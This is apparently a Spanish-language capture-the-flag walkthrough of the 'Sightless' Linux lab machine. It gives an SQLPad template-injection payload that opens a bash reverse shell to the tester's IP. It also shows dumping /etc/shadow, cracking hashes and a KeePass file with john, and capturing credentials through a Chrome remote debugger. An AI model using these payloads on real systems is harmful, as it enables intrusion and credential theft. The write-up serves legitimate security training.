Sightless
OS: Linux
Dificultad: Fácil
Puntos: 20
Nmap Scan
ports=$(nmap -p- --min-rate=5000 -T4 10.129.235.185 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)nmap -vvv -p $ports -sC -sV -oN nmap.txt 10.129.235.185Nmap scan report for 10.129.235.185
Host is up, received echo-reply ttl 63 (0.33s latency).
Scanned at 2024-09-08 07:54:01 EDT for 77s
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.129.235.185]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGoivagBalUNqQKPAE2WFpkFMj+vKwO9D3RiUUxsnkBNKXp5ql1R+kvjG89Iknc24EDKuRWDzEivKXYrZJE9fxg=
| 256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA4BBc5R8qY5gFPDOqODeLBteW5rxF+qR5j36q9mO+bu
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://sightless.htb/
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.94SVN%I=7%D=9/8%Time=66DD9065%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,A3,"220\x20ProFTPD\x20Server\x20\(sightless\.htb\x20FTP\x20S
SF:erver\)\x20\[::ffff:10\.129\.235\.185\]\r\n500\x20Invalid\x20command:\x
SF:20try\x20being\x20more\x20creative\r\n500\x20Invalid\x20command:\x20try
SF:\x20being\x20more\x20creative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelEnumeracion
Identificamos los siguientes subdominios.
10.129.235.185 sightless.htb sqlpad.sightless.htbEn el dominio sqlpad vemos la version de la aplicacion.
Investigando encontramos el siguiente blog.
https://huntr.com/bounties/46630727-d923-4444-a421-537ecd63e7fb
SQLPAD - Template injection
Podemos comprobar la vulnerabilidad de la siguiente forma.
{{ process.mainModule.require('child_process').exec('curl 10.10.14.147') }}
Cuando guardemos la configuracion se ejecutara nuestro payload.
Con el siguiente payload obtenemos una reverse shell.
{{ process.mainModule.require('child_process').exec('bash -c "bash -i >& /dev/tcp/10.10.14.147/1234 0>&1"') }}┌──(root㉿kali)-[~/htb/Box/Sightless]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.147] from (UNKNOWN) [10.129.235.185] 38144
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@c184118df0a6:/var/lib/sqlpad# id
id
uid=0(root) gid=0(root) groups=0(root)Lateral Movement
Encontramos un par de hashes en el archivo shadow.
root@c184118df0a6:~# cat /etc/shadow
cat /etc/shadow
root:$6$jn8fwk6LVJ9IYw30$qwtrfWTITUro8fEJbReUc7nXyx2wwJsnYdZYm9nMQDHP8SYm33uisO9gZ20LGaepC3ch6Bb2z/lEpBM90Ra4b.:19858:0:99999:7:::
daemon:*:19051:0:99999:7:::
bin:*:19051:0:99999:7:::
sys:*:19051:0:99999:7:::
sync:*:19051:0:99999:7:::
games:*:19051:0:99999:7:::
man:*:19051:0:99999:7:::
lp:*:19051:0:99999:7:::
mail:*:19051:0:99999:7:::
news:*:19051:0:99999:7:::
uucp:*:19051:0:99999:7:::
proxy:*:19051:0:99999:7:::
www-data:*:19051:0:99999:7:::
backup:*:19051:0:99999:7:::
list:*:19051:0:99999:7:::
irc:*:19051:0:99999:7:::
gnats:*:19051:0:99999:7:::
nobody:*:19051:0:99999:7:::
_apt:*:19051:0:99999:7:::
node:!:19053:0:99999:7:::
michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:19860:0:99999:7:::El hash del usuario michael es posible crackearlo.
┌──(root㉿kali)-[~/htb/Box/Sightless]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
insaneclownposse (michael)
1g 0:00:00:46 DONE (2024-09-08 08:52) 0.02173g/s 1280p/s 1280c/s 1280C/s kruimel..bluedolphin
Use the "--show" option to display all of the cracked passwords reliablyPodemos conectarnos por SSH con esas credenciales.
michael : insaneclownposse┌──(root㉿kali)-[~/htb/Box/Sightless]
└─# ssh michael@sightless.htb
michael@sightless.htb's password:
Last login: Sun Sep 8 12:54:49 2024 from 10.10.14.147
michael@sightless:~$ id
uid=1000(michael) gid=1000(michael) groups=1000(michael)
michael@sightless:~$ cat user.txt
4d30c8152d162ea36ccba77c21152aa9
michael@sightless:~$Privilege Escalation
Vemos el puerto 8080 local abierto y otros puertos como el 42205/42467.
michael@sightless:~$ netstat -alnp | grep "LISTEN "
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:59833 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:42205 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:42467 0.0.0.0:* LISTEN -Investigando parece que los puertos altos perteneces al chromedriver.
john 1616 0.0 0.5 33660 23348 ? S Sep07 0:33 /usr/bin/python3 /home/john/automation/administration.py
john 1617 0.3 0.3 33630172 14320 ? Sl Sep07 3:42 /home/john/automation/chromedriver --port=59833
john 1622 0.0 0.0 0 0 ? Z Sep07 0:00 [chromedriver] <defunct>
john 1628 0.6 2.7 34019584 109000 ? Sl Sep07 6:32 /opt/google/chrome/chrome --allow-pre-commit-input --disable-background-networking --disable-client-side-phishing-detection --d
john 1630 0.0 0.0 33575860 3104 ? Sl Sep07 0:00 /opt/google/chrome/chrome_crashpad_handler --monitor-self-annotation=ptype=crashpad-handler --database=/tmp/Crashpad --url=http
john 1634 0.0 1.2 34112452 47764 ? S Sep07 0:00 /opt/google/chrome/chrome --type=zygote --no-zygote-sandbox --no-sandbox --enable-logging --headless --log-level=0 --headless -
john 1635 0.0 1.2 34112456 47984 ? S Sep07 0:00 /opt/google/chrome/chrome --type=zygote --no-sandbox --enable-logging --headless --log-level=0 --headless --crashpad-handler-pi
john 1652 0.4 3.2 34366848 128644 ? Sl Sep07 4:23 /opt/google/chrome/chrome --type=gpu-process --no-sandbox --disable-dev-shm-usage --headless --ozone-platform=headless --use-an
john 1653 0.1 1.9 33900068 77912 ? Sl Sep07 1:21 /opt/google/chrome/chrome --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=no
john 1681 3.0 5.9 1186800240 237656 ? Sl Sep07 29:26 /opt/google/chrome/chrome --type=renderer --headless --crashpad-handler-pid=1630 --no-sandbox --disable-dev-shm-usage --enable-
john 1705 0.0 0.0 7372 2800 ? S Sep07 0:00 /bin/bash /home/john/automation/healthcheck.shHaremos portforward de esos puerto con SSH.
┌──(root㉿kali)-[~/htb/Box/Sightless]
└─# ssh michael@sightless.htb -L 8081:127.0.0.1:8080 -L 42467:127.0.0.1:42467
michael@sightless.htb's password:
Last login: Sun Sep 8 12:58:00 2024 from 10.10.14.147
michael@sightless:~$Utilizando el siguiente blog nos ayudaremos para configurar chromium y acceder a los puertos de debug.
https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/chrome-remote-debugger-pentesting/
chrome://inspect/#devices
Veremos lo siguiente y seleccionaremos en inspect.
Nos abrira una ventanda que estara haciendo la accion de autenticarse constantemente. Para poder capturar las credenciales seleccionamos la opcion Network -> Preserve Log. Esperamos a que se autentique y le daremos al icono de stop recording network log.
Obtenemos las credenciales para autenticarnos.
admin : ForlorfroxAdmin
Despues de enumerar un poco mas identificamos los siguiente archivos.
michael@sightless:/var/customers/webs$ find / -name *froxlor* 2>/dev/null
/var/customers/tmp/froxlor.panel
/etc/proftpd/conf.d/99-froxlor-ratelimit.conf
/etc/ssl/froxlor_selfsigned.pem
/etc/ssl/froxlor_selfsigned.key
/etc/apache2/froxlor-htpasswd
/etc/apache2/sites-enabled/10_froxlor_ipandport_192.168.1.118.80.conf
/etc/apache2/sites-enabled/34_froxlor_normal_vhost_web1.sightless.htb.conf
/etc/apache2/sites-enabled/05_froxlor_dirfix_nofcgid.conf
/etc/apache2/sites-enabled/40_froxlor_diroption_666d99c49b2986e75ed93e591b7eb6c8.conf
/etc/cron.d/froxlorEntre los mas importantes es el siguiente.
michael@sightless:/var/www$ cat /etc/apache2/sites-enabled/40_froxlor_diroption_666d99c49b2986e75ed93e591b7eb6c8.conf
# 40_froxlor_diroption_666d99c49b2986e75ed93e591b7eb6c8.conf
# Created 03.09.2024 11:55
# Do NOT manually edit this file, all changes will be deleted after the next domain change at the panel.
<Directory "/var/customers/webs/web1/goaccess/">
AuthType Basic
AuthName "Restricted Area"
AuthUserFile /etc/apache2/froxlor-htpasswd/1-666d99c49b2986e75ed93e591b7eb6c8.htpasswd
require valid-user
</Directory>En el archivo .htpasswd es donde se almacena las credenciales para conectarse por ftp.
michael@sightless:~$ cat /etc/apache2/froxlor-htpasswd/1-666d99c49b2986e75ed93e591b7eb6c8.htpasswd
web1:$2y$10$X5tjC19boiHf81unjwyFFuELwOVBDyEJMlm/eG9Ks6qpxli/L3CiiDesde el portal web podemos modificar el password del usuario web1.
Nos conectamos por ftp de la siguiente forma.
┌──(root㉿kali)-[~/htb/Box/Sightless]
└─# lftp -u web1 sightless.htb
Password:
lftp web1@sightless.htb:~> set ssl:verify-certificate off
lftp web1@sightless.htb:~> ls
drwxr-xr-x 3 web1 web1 4096 May 17 03:17 goaccess
-rw-r--r-- 1 web1 web1 8376 Mar 29 10:29 index.html
lftp web1@sightless.htb:/> cd goaccess
lftp web1@sightless.htb:/goaccess> ls
drwxr-xr-x 2 web1 web1 4096 Aug 2 07:14 backup
lftp web1@sightless.htb:/goaccess> cd backup
lftp web1@sightless.htb:/goaccess/backup> ls
-rw-r--r-- 1 web1 web1 5292 Aug 6 14:29 Database.kdb
lftp web1@sightless.htb:/goaccess/backup> get Database.kdb
5292 bytes transferred in 2 seconds (2.9 KiB/s)
lftp web1@sightless.htb:/goaccess/backup> exitEl archivo kdb necesita ser crackeado por lo tanto usaremos la siguiente herramienta.
keepass2john Database.kdb > hash.txt┌──(root㉿kali)-[~/htb/Box/Sightless]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 600000 for all loaded hashes
Cost 2 (version) is 1 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bulldogs (Database.kdb)
1g 0:00:01:56 DONE (2024-09-08 11:12) 0.008553g/s 8.895p/s 8.895c/s 8.895C/s kucing..pisces
Use the "--show" option to display all of the cracked passwords reliablyAhora es posible acceder al archivo y vemos la llave rsa con documento adjunto.
Con esta llave nos conectamos por SSH.
┌──(root㉿kali)-[~/htb/Box/Sightless]
└─# chmod 400 root-rsa
┌──(root㉿kali)-[~/htb/Box/Sightless]
└─# ssh -i root-rsa root@sightless.htb
Last login: Tue Sep 3 08:18:45 2024
root@sightless:~# cat root.txt
f2ce803a8947775873b6d9873c8be297
root@sightless:~#Referencias
https://huntr.com/bounties/46630727-d923-4444-a421-537ecd63e7fb
https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/chrome-remote-debugger-pentesting/